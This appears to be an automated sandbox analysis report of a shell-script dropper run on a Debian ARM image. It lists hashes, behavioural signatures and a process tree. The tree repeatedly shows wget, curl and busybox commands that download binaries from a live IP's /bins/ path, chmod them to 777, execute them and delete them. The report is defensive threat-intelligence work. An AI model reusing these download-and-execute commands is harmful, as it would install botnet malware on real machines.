Analysis
-
max time kernel
22s -
max time network
36s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
18/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
-
Size
10KB
-
MD5
91ccaeb90f7a1a486a1a1cc72526a2c5
-
SHA1
f4eae2ed37483fd578a41a4edaa29af24ebe85be
-
SHA256
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3
-
SHA512
beb4e0fafb2bc99022e6595d1f0d0e57cd49ae6da6196c900d45f9b3405d9b6a256070fdaf21fff922ed583c8021f0625d81a56fe82e4c7c28ecf1a5578e2d21
-
SSDEEP
192:mploN9In4UdM0DP0B51+JJRzBKOKBiyaploN9s4UdM0XOKBiyX51+JJv7:mploN9In4UdM0DP0EzBBploN9s4UdM0+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 19 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 723 chmod 771 chmod 825 chmod 843 chmod 874 chmod 694 chmod 805 chmod 819 chmod 837 chmod 849 chmod 861 chmod 867 chmod 686 chmod 706 chmod 763 chmod 787 chmod 831 chmod 855 chmod 746 chmod -
Executes dropped EXE 19 IoCs
ioc pid Process /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL 687 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK 695 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB 708 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I 725 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O 749 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ 764 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S 772 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv 788 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp 806 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 820 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 826 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw 832 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn 838 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A 844 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL 850 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK 856 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB 862 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I 868 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O 875 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O -
Checks CPU configuration 1 TTPs 19 IoCs
Checks CPU information which indicate if the system is a virtual machine.
description ioc Process File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl File opened for reading /proc/cpuinfo curl -
description ioc Process File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/sys/crypto/fips_enabled curl File opened for reading /proc/self/auxv curl File opened for reading /proc/self/auxv curl -
Writes file to tmp directory 19 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn curl File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB curl File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O curl File opened for modification /tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB curl File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I curl File opened for modification /tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O curl File opened for modification /tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ curl File opened for modification /tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7 curl File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL curl File opened for modification /tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL curl File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK curl File opened for modification /tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S curl File opened for modification /tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp curl File opened for modification /tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4 curl File opened for modification /tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv curl File opened for modification /tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw curl File opened for modification /tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A curl File opened for modification /tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK curl File opened for modification /tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I curl
Processes
-
/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh1⤵PID:656
-
/bin/rm/bin/rm bins.sh2⤵PID:658
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:660
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:673
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:682
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:686
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:687
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:688
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:689
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:692
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:693
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:694
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:695
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:696
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:697
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:698
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:703
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:706
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:708
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:709
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:711
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:715
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:720
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:723
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:725
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:726
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:727
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:737
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:742
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:746
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:749
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:750
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:752
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:756
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:761
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:763
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:764
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:765
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:766
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:767
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:769
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:771
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:772
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:773
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:774
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:779
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:784
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:787
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:788
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:789
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:791
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:795
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:801
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:805
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:806
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:807
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:808
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:813
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:818
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:819
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:820
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:821
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:822
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:823
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:824
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:825
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:826
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:827
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:828
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:829
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:830
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:831
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:832
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:833
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:834
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:835
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:836
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:837
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:838
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:839
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:840
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:841
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:842
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:843
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:844
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:845
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:846
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:847
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:848
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:849
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:850
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:851
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:852
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:853
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:854
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:855
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:856
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:857
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:858
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:859
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:860
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:861
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:862
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:863
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:864
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:865
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:866
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:867
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:868
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:869
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:870
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
PID:871
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:872
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:874
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:875
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:876
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:877
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97